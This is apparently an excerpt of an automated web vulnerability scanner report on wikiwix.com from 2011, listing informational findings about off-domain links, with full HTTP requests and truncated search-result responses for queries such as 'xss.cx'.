<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiquote.org/wiki/X me no Xs">X me no Xs</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs">An X among Ys, a Y among Xs</a>
...[SNIP]...
<li><a href="http://en.wikiquote.org/wiki/Category:Memes" target="_blanck">Memes</a>
...[SNIP]...
<li><a href="http://en.wikiquote.org/wiki/Category:Memes" target="_blanck">Memes</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.7. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?map=true&lang=en&action=xss.cx&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?art=true&action=xss.cx&lang=en&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:42 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5930
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta h
...[SNIP]...
</script>

<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAK5FDbIBqNjTZM2BZhS3aEhSpMqWNA3hmJyXJVY9_odrW6jPvwRQNAVvZCeX_ry7iQ3jsGbdEaz-jjw" type="text/javascript"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.8. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?timeline=true&date=4-7&lang=en HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:06 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 10416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:php="http://php.net/xsl">
<head xmlns="http://www.w3.org/1999/xhtml"><meta htt
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://www.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.9. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?art=true&action=xss.cx&lang=en&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:10 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 46604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Los_Angeles">Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies">Companies</a></li>
<li><a href="http://en.wikipedia.org/wiki/Portal:Greater_Los_Angeles">Greater Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Internet">Internet</a></li>
<li><a href="http://en.wikipedia.org/wiki/Portal:Software_Testing">Software Testing</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Esperanto">Esperanto</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Disambiguation_pages">Disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_article_disambiguation_pages">All article disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_disambiguation_pages">All disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Esperanto_publications">Esperanto publications</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.myspace.com/">Myspace Global</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://au.myspace.com/">Myspace Australia</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://br.myspace.com/">Myspace Brazil</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://xsser.sf.net">XSSer: automatic -framework- to detect, exploit and report XSS vulnerabilities</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://bugtraq.totalh.com">BUGTRAQ-VULNERABLE SITE TRACKER</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.whitehatsec.com/home/assets/WPStatsreport_100107.pdf">WhiteHat Security Vulnerabilties White Paper</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.boeing.com/defense-space/space/xss/index.htm">XSS Micro-Satellite</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://nssdc.gsfc.nasa.gov/nmc/masterCatalog.do?sc=2003-005B">2003-005B</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.space.com/missionlaunches/xss10_update_030130.html"> Air Force XSS-10 Micro-Satellite Mission a Success </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.bindshell.net/papers/xssv/"> The Cross-site Scripting Virus </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://seclists.org/bugtraq/2002/Oct/119"> XSS bug in hotmail login page </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.techspot.com/news/24226-myspace-speaks-about-samy-kamkars-sentencing.html"> Myspace Speaks about Samy Kamkar's Sentencing </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://blog.outer-court.com/archive/2005-10-14-n81.html">An interview with Samy</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://it.slashdot.org/it/05/10/14/126233.shtml?tid=172&amp;tid=95&amp;tid=220">slashdot.org discussion</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.sophos.com/virusinfo/analyses/jsspaceheroa.html"> JS/Spacehero-A, Sophos threat analysis </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.patentstorm.us/patents/6110935-description.html"> Benzofurazan compounds for enhancing glutamatergic synaptic responses </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://dx.doi.org/10.1007%2Fs00213-008-1360-z">10.1007/s00213-008-1360-z</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.ncbi.nlm.nih.gov/pubmed/18985324">18985324</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://acronyms.thefreedictionary.com/CX">CX Acronym List</a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/MySpace">MySpace</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Foxinteractivemediaheadquarters.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Foxinteractivemediaheadquarters.jpg&amp;width=56x56&amp;lang=en" alt="Foxinteractivemediaheadquarters" border="0" width="56" height="56" title="click t
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Myspace">Myspace</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Foxinteractivemediaheadquarters.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Foxinteractivemediaheadquarters.jpg&amp;width=56x56&amp;lang=en" alt="Foxinteractivemediaheadquarters" border="0" width="56" height="56" title="click t
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Cross-site scripting">Cross-site scripting</a>
...[SNIP]...
<h2><a href="http://xss.cx/examples/netsparker/www.firstmateonline.com_80.htm">SQL Injection Report for http://www.firstmateonline.com/businessinfo.php?sponsor=8159&amp;location=17044</a>
...[SNIP]...
<span><a href="http://xss.cx/examples/netsparker/www.firstmateonline.com_80.htm">http://xss.cx/examples/netsparker/www.firstmateonline.com_80.htm</a>
...[SNIP]...
<h2><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">Job for Professional Group ExercisesTrainers (CX), Saudi Arabia | JobsNama</a>
...[SNIP]...
<span><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS 10">XSS 10</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Delta-II_Stage2_XSS-10.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Delta-II_Stage2_XSS-10.jpg&amp;width=56x56&amp;lang=en" alt="Delta-II_Stage2_XSS-10" border="0" width="56" height="56" title="click to enlarge that pic
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS">XSS</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS Worm">XSS Worm</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Samy (XSS)">Samy (XSS)</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/CX717">CX717</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/..">..</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/CX">CX</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies" target="_blanck">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies" target="_blanck">Companies</a></li><li><a href="http://en.wikipedia.org/wiki/Portal:Los_Angeles" target="_blanck">Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies" target="_blanck">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies" target="_blanck">Companies</a></li><li><a href="http://en.wikipedia.org/wiki/Portal:Greater_Los_Angeles" target="_blanck">Greater Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Internet" target="_blanck">Internet</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Software_Testing" target="_blanck">Software Testing</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_article_disambiguation_pages" target="_blanck">All article disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_disambiguation_pages" target="_blanck">All disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Disambiguation_pages" target="_blanck">Disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security" target="_blanck">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security" target="_blanck">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Esperanto_publications" target="_blanck">Esperanto publications</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Esperanto" target="_blanck">Esperanto</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.10. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en&action=xss.cx&disp=dict HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?map=true&lang=en&action=xss.cx&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:51 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 23132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_abbreviations,_acronyms_and_initialisms">English abbreviations, acronyms and initialisms</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_initialisms">English initialisms</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:Translingual_symbols">Translingual symbols</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:ISO_3166-1">ISO 3166-1</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:Roman_numerals">Roman numerals</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_abbreviations">English abbreviations</a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/MySpace' target='_blank'> MySpace </a></li><li><a href ='http://en.wikipedia.org/wiki/Myspace' target='_blank'> Myspace </a></li><li><a href ='http://en.wikipedia.org/wiki/Cross-site scripting' target='_blank'> Cross-site scripting </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/XSS 10' target='_blank'> XSS 10 </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS Worm' target='_blank'> XSS Worm </a></li><li><a href ='http://en.wikipedia.org/wiki/Samy (XSS)' target='_blank'> Samy (XSS) </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/CX717' target='_blank'> CX717 </a></li><li><a href ='http://en.wikipedia.org/wiki/..' target='_blank'> .. </a></li><li><a href ='http://en.wikipedia.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
